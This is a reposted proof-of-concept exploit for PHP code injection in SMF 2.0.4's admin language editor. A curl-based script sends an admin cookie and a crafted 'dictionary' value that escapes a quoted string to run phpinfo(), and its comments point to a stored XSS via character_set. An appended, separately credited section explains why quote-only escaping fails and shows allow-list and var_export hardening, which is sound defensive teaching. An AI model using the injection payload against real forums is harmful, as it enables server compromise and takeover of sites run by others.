
SMF 2.0.4 PHP Code Injection

2013-05-09 15:55
<?php
 
// proof of concept that latest SMF (2.0.4) can be exploited by php injection.
 
// payload code must escape from \', so you should try with something like that:
// p0c\';phpinfo();// as a 'dictionary' value. Same story for locale parameter.
// For character_set - another story, as far as I remember, because here we have
// a nice stored xss. ;)
 
// 21/04/2013 
// http://HauntIT.blogspot.com
 
// to successfully exploit smf 2.0.4 we need correct admin's cookie:
$cookie = 'SMFCookie956=allCookiesHere';
$ch = curl_init('http://smf_2.0.4/index.php?action=admin;area=languages;sa=editlang;lid=english');
 
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_POST, 1); // send as POST (to 'On')
curl_setopt($ch, CURLOPT_POSTFIELDS, "character_set=en&locale=helloworld&dictionary=p0c\\';phpinfo();//&spelling=american&ce0361602df1=c6772abdb6d5e3f403bd65e3c3c2a2c0&save_main=Save");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
 
$page = curl_exec($ch);
 
echo 'PHP code:<br>'.$page;
 
curl_close($ch); // to close 'logged-in' part
 
?>
Source: www.2cto.com/Article/201305/209337.html
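
Added example (not from the PoC author and not SMF source): why escaping only the quote fails for the 'dictionary' value in the PoC above, shown beside a hardened form. It assumes the language editor writes each setting into a single-quoted PHP string in a generated file; the function names and the allow-list pattern are illustrative.

```php
<?php
// Added illustration, not SMF source. Assumption: the language editor saves each
// setting as a single-quoted PHP string in a generated language file.

// Weak form: escapes quotes only. A backslash placed before the quote pairs with
// the added escape, so the literal ends early and the remainder is parsed as code.
function weak_literal(string $value): string
{
    return "'" . str_replace("'", "\\'", $value) . "'";
}

// Hardened form, step 1: accept only the shape a locale, dictionary or
// character set name needs (assumed allow-list; adjust to the real value set).
function is_valid_setting(string $value): bool
{
    return preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $value) === 1;
}

// Hardened form, step 2: var_export() escapes backslashes and quotes together.
function safe_literal(string $value): string
{
    return var_export($value, true);
}

// True when the generated text tokenises as exactly one string literal.
function is_single_literal(string $literal): bool
{
    $kinds = [];
    foreach (token_get_all('<?php ' . $literal . ';') as $token) {
        $kind = is_array($token) ? $token[0] : $token;
        if ($kind !== T_OPEN_TAG && $kind !== T_WHITESPACE) {
            $kinds[] = $kind;
        }
    }
    return $kinds === [T_CONSTANT_ENCAPSED_STRING, ';'];
}

// Constructed inputs: a normal value and the 'dictionary' value from the PoC above.
$samples = ['american', 'p0c\\\';phpinfo();//'];
foreach ($samples as $value) {
    printf(
        "%-22s allow-listed=%-3s weak=%-3s var_export=%s\n",
        $value,
        is_valid_setting($value) ? 'yes' : 'no',
        is_single_literal(weak_literal($value)) ? 'ok' : 'BAD',
        is_single_literal(safe_literal($value)) ? 'ok' : 'BAD'
    );
}
```

The same allow-list also keeps markup out of character_set, the parameter the PoC comments flag for stored XSS.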
